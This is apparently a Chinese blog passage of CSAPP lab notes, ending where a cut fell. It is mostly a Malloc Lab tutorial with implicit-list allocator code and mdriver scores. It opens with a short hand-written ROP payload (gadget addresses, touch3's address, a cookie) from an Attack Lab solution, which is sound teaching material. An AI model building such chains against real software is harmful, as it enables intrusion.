13 1a 40 00 00 00 00 00 // mov %ecx, %esi
d6 19 40 00 00 00 00 00 // lea (%rdi,%rsi,1),%rax
a2 19 40 00 00 00 00 00 // mov %rax, %rdi
fa 18 40 00 00 00 00 00 // addr of touch3
35 39 62 39 39 37 66 61 // cookie

作为一名pwn手,感觉这些都很基础

以前一直依赖 pwntools 进行攻击,现在感受了一把手工入侵,算是长见识了吧

Malloc Lab

学生实现他们自己版本的 malloc,free 和 realloc,当然不仅要正确的实现相关功能,也要满足速度效率等要求

开始实验之前需要一些前置知识

动态内存分配器

动态内存分配器维护了一个进程的虚拟内存区域(被称为堆)

对于每个进程,内核维护着一个变量brk(break),它指向堆的顶部

动态内存分配器把堆视为一组 不同大小的块 的集合体,每个块就是一个连续的虚拟内存片(chunk),它有两种状态:已分配(allocated),空闲(free)

动态内存分配器有两种风格,两个风格都要求应用 显式地 分配内存,不同之处在于哪个实体来负责释放已分配的块

  • 显式分配器:要求应用 显式地 释放已分配的块(主动释放,只有调用相应的函数才能将chunk释放掉),比如:C中的 malloc 和 free,C++中的 new 和 delete
  • 隐式分配器:要求应用 隐式地 释放已分配的块(自动释放,要求分配器自己检测chunk何时不被程序利用),比如:java,ML,Lisp都依赖 “垃圾收集” 来释放chunk

分配器的基本规则

在写分配器前,先要了解malloc的功能的特点:

基础功能

malloc 可以在 heap 获取一片内存(由数据结构chunk进行管理),并返回“chunk->FD”

如果 malloc 遇到问题(例如,程序要求的内存块比可用的虚拟内存还要大),那么它就返回 NULL,并设置 errno

free 可以释放一片内存空间

内存对齐

malloc 会返回至少为“chunk->size”字节的的chunk,chunk的大小也会受 内存对齐 的影响

案例:32位程序,一个空格代表4字节,初始16字,双字对齐

+ + 1:malloc申请了4字大小的chunk,实际上申请了4字 + 2:malloc申请了5字大小的chunk,实际上申请了6字(双字对齐) + 3:malloc申请了6字大小的chunk,实际上申请了6字 + 4:free释放了P2 + 5:malloc申请了2字大小的chunk,优先占用了P2的 free chunk(fastbin & Tcachebin) **内存管理** 内存管理可以分为以下几个问题: + 空闲块的组织方式 + 空闲块的再申请 + 空闲块的分割 + 空闲块的合并 为了应对这些问题,我们需要学习相应的技术 **必要检查** 先抛开安全方面的检查,malloc必须要满足一些约束条件: + 每个释放请求必须对应一个当前已分配的块,这个块是由一个以前的分配请求获得到的 + 立刻响应请求 + 不修改已经分配的chunk(申请的chunk不重叠) ## 内存块组织技术 针对空闲块的组织方法有以下三种: + 隐式空闲链表(implicit free list) + 显式空闲链表(explicit free list) + 分离空闲链表(segregated free list) 这里主要介绍前两种 **隐式空间链表** 任何实际的分配器都需要一些数据结构,允许它来区别块边界,以及区别已分配块和空闲块,大多数分配器将这些信息嵌入块本身:

隐式空闲链表就是一种简单空闲块组织结构,可以把堆 按地址顺序 组织成一个连续的,包含allocated chunk和free chunk的链表

阴影部分是已分配块,没有阴影的部分是空闲块,头部标记为(size / flag)

因为分配器需要通过 flag 才能辨别该chunk的类型,所以它在重新申请chunk时,需要遍历整个链表,以获取合适的free chunk

显式空闲链表

块分配与堆块的总数呈线性关系,所以对于通用的分配器,隐式空闲链表是不适合的,一种更好的方法是 将空闲块组织为某种形式 的显式数据结构

通过“free chunk->FD”和“free chunk->BK”把free chunk连接为一个双向链表

此后进行遍历时,就不用对allocated chunk进行操作了

放置策略

为了提高内存利用率,空闲块的再申请是必不可少的,想要获取合适的空闲块,程序必须先进行搜索,分配器执行这种搜索的方式是由放置策略(placement policy)确定的,一些常见的策略是:

  • 首次适配(first-fit)
  • 下次适配(next-fit)
  • 最佳适配(best-fit)

比如:隐式空闲链表中的最佳适配,就是采用遍历所有chunk方式

首次适配

首次适配算法的分配内存的设计思路是:物理内存页管理器顺着双向链表进行搜索空闲内存区域,直到找到一个足够大的空闲区域,然后立刻将其进行分配(或分割后分配),此后的内存块都不做处理

优点:速度迅速

缺点:分割后剩下的内存块会越来越难以利用

下次适配

下次适配和首次适配相似,只不过不是每次都从链表的起始处开始搜索,而是从上一次查询结束的地方开始

最佳适配

每一次都遍历所有内存块,获取最合适的

优点:剩下的内存块利用率较高

缺点:速度缓慢

空闲块分割

在 “空闲块再申请” 的过程中,不一定每一次都可以刚好分离相同大小的空闲块,所以在必要时刻需要对空闲块进行分割

对其再申请4字后,剩下的4字大小的free chunk更加难以利用了

边界标记

边界标记(boundary tag),允许在常数时间内进行对前面块的合并

在每个块的结尾处添加一个脚部(footer,边界标记)

​ // 原本内存块的 头部 就可以标记chunk的状态,脚部只是头部的一个副本

如果每个块包括这样一个脚部,那么分配器就可以通过检査它的脚部,判断前面一个块的起始位置和状态,这个脚部总是在距当前块开始位置一个字的距离

考虑当分配器释放当前块时所有可能存在的情况:

  • 情况1:前面的块和后面的块都是已分配的
  • 情况2:前面的块是已分配的,后面的块是空闲的
  • 情况3:前面的块是空闲的,而后面的块是已分配的
  • 情况4:前面的和后面的块都是空闲的

有3个独立的内存块,释放中间那个内存块:

  • 情况1:不进行合并
  • 情况2:通过更新脚部的位置,和后面的块进行合并
  • 情况3:通过更新头部的位置,和前面的块进行合并
  • 情况4:同时更新头部和脚部的位置,和相邻两个块进行合并

缺陷:它要求每个块都保持一个头部和一个脚部,在应用程序操作许多个小块时,会产生显著的内存开销

性能提升

当所有malloc的基础要求完成过后,我们就需要考虑它的性能,分配器的编写者往往需要实现 吞吐率 最大化,和 内存使用率最大化 ,但是这两个性能又往往是冲突的

吞吐率最大化

吞吐率:单位时间里完成的请求数,比如:1秒完成500次申请请求,500次释放请求,那么它的吞吐率就是每秒1000次操作

合理性能:分配请求的 最糟运行时间 与 空闲块数量 形成的线性关系

内存利用率最大化

一个系统内所有进程分配的虚拟内存大全部数量,受磁盘上交换空间的数量限制

峰值利用率:用来描述分配器使用堆的效率

实验程序介绍

实验给出了“memlib.c”,提供了一个内存系统模拟程序,可以在不干涉系统内存的前提下进行实验

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
/*
* memlib.c - a module that simulates the memory system. Needed because it
* allows us to interleave calls from the student's malloc package
* with the system's malloc package in libc.
*/
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
#include <errno.h>

#include "memlib.h"
#include "config.h"

/* private variables */
static char *mem_start_brk; /* points to first byte of heap */
static char *mem_brk; /* points to last byte of heap */
static char *mem_max_addr; /* largest legal heap address */

/*
* mem_init - initialize the memory system model
*/
void mem_init(void)
{
/* allocate the storage we will use to model the available VM */
if ((mem_start_brk = (char *)malloc(MAX_HEAP)) == NULL) {
fprintf(stderr, "mem_init_vm: malloc error\n");
exit(1);
}

mem_max_addr = mem_start_brk + MAX_HEAP; /* max legal heap address */
mem_brk = mem_start_brk; /* heap is empty initially */
}

/*
* mem_deinit - free the storage used by the memory system model
*/
void mem_deinit(void)
{
free(mem_start_brk);
}

/*
* mem_reset_brk - reset the simulated brk pointer to make an empty heap
*/
void mem_reset_brk()
{
mem_brk = mem_start_brk;
}

/*
* mem_sbrk - simple model of the sbrk function. Extends the heap
* by incr bytes and returns the start address of the new area. In
* this model, the heap cannot be shrunk.
*/
void *mem_sbrk(int incr)
{
char *old_brk = mem_brk;

if ( (incr < 0) || ((mem_brk + incr) > mem_max_addr)) {
errno = ENOMEM;
fprintf(stderr, "ERROR: mem_sbrk failed. Ran out of memory...\n");
return (void *)-1;
}
mem_brk += incr;
return (void *)old_brk;
}

/*
* mem_heap_lo - return address of the first heap byte
*/
void *mem_heap_lo()
{
return (void *)mem_start_brk;
}

/*
* mem_heap_hi - return address of last heap byte
*/
void *mem_heap_hi()
{
return (void *)(mem_brk - 1);
}

/*
* mem_heapsize() - returns the heap size in bytes
*/
size_t mem_heapsize()
{
return (size_t)(mem_brk - mem_start_brk);
}

/*
* mem_pagesize() - returns the page size of the system
*/
size_t mem_pagesize()
{
return (size_t)getpagesize();
}
  • void *mem sbrk(int incr):和系统的 sbrk 一致,用于分配内存
  • void *mem_heap_lo(void):返回指向堆的第一个字节的指针
  • void *mem_heap_hi(void):返回指向堆的最后一个字节的指针
  • size_t mem_heapsize(void):返回当前的堆大小
  • size_t mem_pagesize(void):返回系统的 page size(页大小)

分配器包含在“mm.c”,需要完成下面几个函数:

1
2
3
4
int mm_init(void); // 初始化分配器,成功返回0,否则返回-1
void *mm_malloc(size_t size); //
void mm_free(void *ptr);
void *mm_realloc(void *ptr, size_t size);

最后,实验还给出了调试程序“mdriver.c”,可以给你的作品打分

隐式空闲链表+首次适配

第一次实验采用CSAPP上的案例,后续在进行修改

写程序之前需要先写入基本宏定义:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/* Basic constants and macros */
#define WSIZE 4 /* Word and header/footer size (bytes) */
#define DSIZE 8 /* Double word size (bytes) */
#define CHUNKSIZE (1<<12) /* Extend heap by this amount (bytes) */

#define MAX(x, y) ((x) > (y)? (x) : (y))

/* Pack a size and allocated bit into a word */
#define PACK(size, alloc) ((size) | (alloc))

/* Read and write a word at address p */
#define GET(p) (*(unsigned int *)(p))
#define PUT(p, val) (*(unsigned int *)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)

/* Given block ptr bp, compute address of its header and footer */
#define HDRP(bp) ((char *)(bp) - WSIZE)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)

/* Given block ptr bp, compute address of next and previous blocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(((char *)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DSIZE)))
  • PACK(size, alloc):把”chunk->size”和”P”包装为1位
  • GET(p):从 p 中读取4字节的数据( 这里强制类型转换是至关重要的 )
  • PUT(p, val) :将 val 存放在参数 p 指向的地址中
  • GET_SIZE(p):获取头部的SIZE(通过GET(p)获取头部,接着“UNPACK”)
  • GET_ALLOC(p):获取”P位”
  • HDRP(bp):返回指向当前块头部的指针(减去一字刚好计算出头部)
  • FTRP(bp):返回指向当前块脚部的指针(加上SIZE后,相当于多加了一个脚部,所以减两字)
  • NEXT_BLKP(bp):返回指向后面块BP的指针(从当前块的头部获取SIZE,相加)
  • PREV_BLKP(bp):返回指向前面块BP的指针(从上一个块的脚部获取SIZE,相减)

注意:因为“FTRP”是根据“HDRP”计算出的,所以必须先写入头部,才能写入脚部

对堆进行初始化:

1
2
3
4
5
6
7
8
9
10
11
12
13
int mm_init(void)
{
if ((heap_listp = mem_sbrk(4 * WSIZE)) == (void*)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + (1 * WSIZE), PACK(DSIZE, 1)); // 初始化头部(4~8)
PUT(heap_listp + (2 * WSIZE), PACK(DSIZE, 1)); // 初始化脚部(8~12)
PUT(heap_listp + (3 * WSIZE), PACK(0, 1)); // 初始化下一个头部(12~16)
heap_listp += (2 * WSIZE);
if (extend_heap(CHUNKSIZE / WSIZE) == NULL)
return -1;
return 0;
}

创建一个空的空闲链表(采用隐式空间链表):

  • heap_listp用于记录第一个内存块的数据区(与脚部重合,但是可以被宏定义识别)
  • 第一个内存块不写入数据(没有意义,后续操作都将会跳过它,直接获取下一个内存块)

接着它调用 extend_heap 函数

这个函数用于申请内存块,初始化使将堆扩展 CHUNKSIZE 字节,并且创建初始的空闲块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static void *extend_heap(size_t words)
{
void *bp;
size_t size;

/* Allocate an even number of words to maintain alignment */
size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;

/* Initialize free block header/footer and the epilogue header */
PUT(HDRP(bp), PACK(size, 0)); /* Free block header */
PUT(FTRP(bp), PACK(size, 0)); /* Free block footer */
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1)); /* New epilogue header */

/* Coalesce if the previous block was free */
return coalesce(bp);
}

extend_heap保证了,“mem_sbrk(size)”的size大小为8的倍数(内存对齐)

后续的PUT填入了当前块的头部和脚部,和下一个块的头部

函数coalesce用于合并堆块,在mm_free中也会使用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
void mm_free(void *bp)
{
size_t size = GET_SIZE(HDRP(bp));

PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
coalesce(bp);
}

static void *coalesce(void *bp)
{
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));
if (prev_alloc && next_alloc) { /* Case 1 */
return bp;
}
else if (prev_alloc && !next_alloc) { /* Case 2 */
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
}
else if (!prev_alloc && next_alloc) { /* Case 3 */
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
bp = PREV_BLKP(bp);
}else { /* Case 4 */
size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(FTRP(NEXT_BLKP(bp)));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
return bp;
}

coalesce先获取了上一个块的脚部,下一个块的头部,和当前的SIZE

  • case1:上一个块allocated,下一个块allocated,不合并
  • case2:上一个块allocated,下一个块free,把“SIZE”加上“NEXT_BLKP->SIZE”,更新脚部
  • case3:上一个块free,下一个块allocated,把“SIZE”加上“PREV_BLKP->SIZE”,更新头部
  • case4:上一个块free,下一个块free,把“SIZE”同时加上前后两者的“SIZE”,更新头部&脚部

mm_malloc函数会先检查请求的真假,然后进行申请,必须保证8字节对齐,另外需要8字节来存放头部和脚部,对于超过8字节的请求,一般的规则是加上开销字节,然后向上舍入到最接近的8的整数倍

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void *mm_malloc(size_t size)
{
size_t asize; /* Adjusted block size */
size_t extendsize; /* Amount to extend heap if no fit */
char *bp;

/* Ignore spurious requests */
if (size <= 0)
return NULL;
/* Adjust block size to include overhead and alignment reqs. */
if (size <= DSIZE)
asize = 2 * DSIZE;
else
asize = DSIZE * ((size + (DSIZE) + (DSIZE - 1)) / DSIZE);
/* Search the free list for a fit */
if ((bp = find_fit(asize)) != NULL) {
place(bp, asize);
return bp;
}
/* No fit found. Get more memory and place the block */
extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / WSIZE)) == NULL)
return NULL;
place(bp, asize);
return bp;
}

mm_malloc中的:

1
asize = DSIZE * ((size + (DSIZE) + (DSIZE - 1)) / DSIZE);

保证了用于申请的asize一定为8的倍数,并且留有8字节头部和脚部的空间

find_fit用于查找合适的空闲块,place用于放置空闲块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static void *find_fit(size_t asize)
{
char *bp = heap_listp;
size_t alloc;
size_t size; /* heap_listp 指向第一个内存块,没有意义,直接获取下一个内存块 */
while (GET_SIZE(HDRP(NEXT_BLKP(bp))) > 0) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
return NULL;
}

采用首次适配(first-fit):遇到allocated chunk,或者free chunk的size不够,就重新循环

直到找寻到合适的空闲块后,输出其BP(数据区指针)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static void place(void *bp, size_t asize)
{
size_t size = GET_SIZE(HDRP(bp));

if ((size - asize) >= (2*DSIZE)) {
PUT(HDRP(bp),PACK(asize,1));
PUT(FTRP(bp),PACK(asize,1));
PUT(HDRP(NEXT_BLKP(bp)),PACK(size - asize,0));
PUT(FTRP(NEXT_BLKP(bp)),PACK(size - asize,0));
} else {
PUT(HDRP(bp),PACK(size,1));
PUT(FTRP(bp),PACK(size,1));
}
}

因为内存块最小为“ 2*DSIZE ”(16字节),所以如果切割剩余内存块小于16字节就不能进行切割,利用边界标记技术,可以通过“添加内存块边界”来进行切割

更新一下mm_realloc:

1
2
3
4
5
6
7
8
9
10
11
12
void *mm_realloc(void *ptr, size_t size)
{
size_t oldsize = GET_SIZE(HDRP(ptr));
void* newptr = mm_malloc(size);
if (!newptr)
return 0;
if (!ptr)
return newptr;
memcpy(newptr, ptr, (size < oldsize ? size : oldsize));
mm_free(ptr);
return newptr;
}

整体逻辑:

  • 先用“extend_heap”初始化一个大小为CHUNKSIZE的大内存块,使其为free状态
  • 后续的malloc都在这个大内存块中分割
  • 如果大内存块不够用,就再次调用“extend_heap”进行申请

打分&完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* 隐式空闲链表+首次适配 */
➜ [/home/ywhkkx/malloclab-handout] ./mdriver -v
Team Name:ateam
Member 1 :Harry Bovik:bovik@cs.cmu.edu
Using default tracefiles in /home/ywhkkx/malloclab-handout/traces/
Measuring performance with gettimeofday().

Results for mm malloc:
trace valid util ops secs Kops
0 yes 99% 5694 0.006554 869
1 yes 99% 5848 0.005849 1000
2 yes 99% 6648 0.010224 650
3 yes 100% 5380 0.006037 891
4 yes 66% 14400 0.000076188976
5 yes 92% 4800 0.005052 950
6 yes 92% 4800 0.006428 747
7 yes 55% 12000 0.070162 171
8 yes 51% 24000 0.237273 101
9 yes 27% 14401 0.047580 303
10 yes 34% 14401 0.001504 9575
Total 74% 112372 0.396739 283

Perf index = 44 (util) + 19 (thru) = 63/100
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

#define WSIZE 4
#define DSIZE 8
#define CHUNKSIZE (1 << 12)
#define MAX(X, Y) ((X) > (Y) ? (X) : (Y))
#define PACK(size, alloc) ((size) | (alloc))
#define GET(p) (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))
#define GET_SIZE(P) (GET(P) & ~0X7)
#define GET_ALLOC(P) (GET(P) & 0X1)
#define HDRP(bp) ((char*)(bp) - WSIZE)
#define FTRP(bp) ((char*)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)
#define NEXT_BLKP(bp) ((char*)(bp) + GET_SIZE(((char*)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char*)(bp) - GET_SIZE(((char*)(bp) - DSIZE)))
static void* extend_heap(size_t words);
static void* coalesce(void* bp);
static void *find_fit(size_t size);
static void place(void *bp,size_t asize);
static char *heap_listp = 0;

/*
* mm_init - initialize the malloc package.
*/

int mm_init(void)
{
if ((heap_listp = mem_sbrk(4 * WSIZE)) == (void*)-1)
return -1;
PUT(heap_listp + (1 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (2 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (3 * WSIZE), PACK(0, 1));
heap_listp += (2 * WSIZE);
if (extend_heap(CHUNKSIZE/WSIZE) == NULL)
return -1;
return 0;
}

static void* extend_heap(size_t words){
char* bp;
size_t size;
size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));
return coalesce(bp);
}

static void* coalesce(void* bp){
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));
if (prev_alloc && next_alloc)
return bp;
else if (prev_alloc && !next_alloc){
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
PUT(HDRP(bp), PACK(size, 0));
}
else if (!prev_alloc && next_alloc){
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
else{
size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
return bp;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/

void *mm_malloc(size_t size)
{
char *bp;
size_t asize;
size_t extendsize;
if (size <= 0)
return NULL;
if (size <= DSIZE)
asize = 2 * DSIZE;
else
asize = DSIZE * ((size + DSIZE + (DSIZE - 1)) / DSIZE);
if ((bp = find_fit(asize)) != NULL){
place(bp, asize);
return bp;
}
extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / WSIZE)) == NULL)
return NULL;
place(bp, asize);
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/

void mm_free(void *ptr)
{
size_t size = GET_SIZE(HDRP(ptr));
PUT(HDRP(ptr), PACK(size, 0));
PUT(FTRP(ptr), PACK(size, 0));
coalesce(ptr);
return;
}

static void *find_fit(size_t asize)
{
char *bp = heap_listp;
size_t alloc;
size_t size;
while (GET_SIZE(HDRP(NEXT_BLKP(bp))) > 0) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
return NULL;
}
static void place(void *bp, size_t asize)
{
size_t size = GET_SIZE(HDRP(bp));

if ((size - asize) >= (2*DSIZE)) {
PUT(HDRP(bp),PACK(asize,1));
PUT(FTRP(bp),PACK(asize,1));
PUT(HDRP(NEXT_BLKP(bp)),PACK(size - asize,0));
PUT(FTRP(NEXT_BLKP(bp)),PACK(size - asize,0));
} else {
PUT(HDRP(bp),PACK(size,1));
PUT(FTRP(bp),PACK(size,1));
}
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/

void *mm_realloc(void *ptr, size_t size)
{
size_t oldsize = GET_SIZE(HDRP(ptr));
void* newptr = mm_malloc(size);
if (!newptr)
return 0;
if (!ptr)
return newptr;
memcpy(newptr, ptr, (size < oldsize ? size : oldsize));
mm_free(ptr);
return newptr;
}

隐式空闲链表+下次适配

想要实现下次适配的代码和书上有所不同,需要有所改进

首先需要一个全局指针来记录“上一次操作”

1
static char* pre_listp;

在一些函数快结束时(不包括“place”和“coalesce”),该指针都要更新为当前块的BP(指向数据区的指针)

另外,“find_fit”需要重写:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static void *find_fit(size_t asize)
{
char *bp = pre_listp;
size_t alloc;
size_t size;
while (GET_SIZE(HDRP(NEXT_BLKP(bp))) > 0) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
bp = heap_listp; /* 这里也是跳过第一个内存块,直接获取下一个 */
while (bp != pre_listp) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
return NULL;
}

这里需要注意:

  • 当下次适配遍历完所有的空闲块时,需要把BP重置为heap_listp(第一个内存块)
  • 只需要“mm_malloc”中记录一下“pre_listp”,重复记录可能会报错
  • 可以把“pre_listp”初始化为第二个内存块的BP(比如本程序),也可以初始化为第一个

打分&完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* 隐式空闲链表+下次适配 */
➜ [/home/ywhkkx/malloclab-handout] ./mdriver -v
Team Name:ateam
Member 1 :Harry Bovik:bovik@cs.cmu.edu
Using default tracefiles in /home/ywhkkx/malloclab-handout/traces/
Measuring performance with gettimeofday().

Results for mm malloc:
trace valid util ops secs Kops
0 yes 89% 5694 0.001789 3183
1 yes 91% 5848 0.001089 5371
2 yes 95% 6648 0.003659 1817
3 yes 97% 5380 0.002975 1808
4 yes 66% 14400 0.000112128228
5 yes 92% 4800 0.003465 1385
6 yes 90% 4800 0.002659 1805
7 yes 55% 12000 0.006609 1816
8 yes 51% 24000 0.006411 3744
9 yes 27% 14401 0.041252 349
10 yes 30% 14401 0.001649 8734
Total 71% 112372 0.071668 1568

Perf index = 43 (util) + 40 (thru) = 83/100
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

#define WSIZE 4
#define DSIZE 8
#define CHUNKSIZE (1<<12)
#define MAX(x,y) ((x) > (y)? (x) : (y))
#define PACK(size,alloc) ((size) | (alloc))
#define GET(p) (*(unsigned int *)(p))
#define PUT(p,val) (*(unsigned int *)(p) = (val))
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)
#define HDRP(bp) ((char *)(bp) - WSIZE)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)
#define NEXT_BLKP(bp) ((char*)(bp) + GET_SIZE(((char *)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char*)(bp) - GET_SIZE(((char *)(bp) - DSIZE)))

static void* extend_heap(size_t words);
static void* coalesce(void* bp);
static void* find_fit(size_t asize);
static void place(void* bp, size_t asize);

static char* heap_listp;
static char* pre_listp;

/*
* mm_init - initialize the malloc package.
*/

int mm_init(void)
{
if ((heap_listp = mem_sbrk(4 * WSIZE)) == (void*)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + (1 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (2 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (3 * WSIZE), PACK(0, 1));
heap_listp += (2 * WSIZE);
pre_listp = (unsigned int)heap_listp + DSIZE;
if (extend_heap(CHUNKSIZE / WSIZE) == NULL)
return -1;
return 0;
}

static void* extend_heap(size_t words)
{
char* bp;
size_t size;

size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));
pre_listp = coalesce(bp);
return pre_listp;
}

static void* coalesce(void* bp)
{
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));
if (prev_alloc && next_alloc)
return bp;
if (prev_alloc && !next_alloc)
{
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
PUT(HDRP(bp), PACK(size, 0));
}
else if (!prev_alloc && next_alloc)
{
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
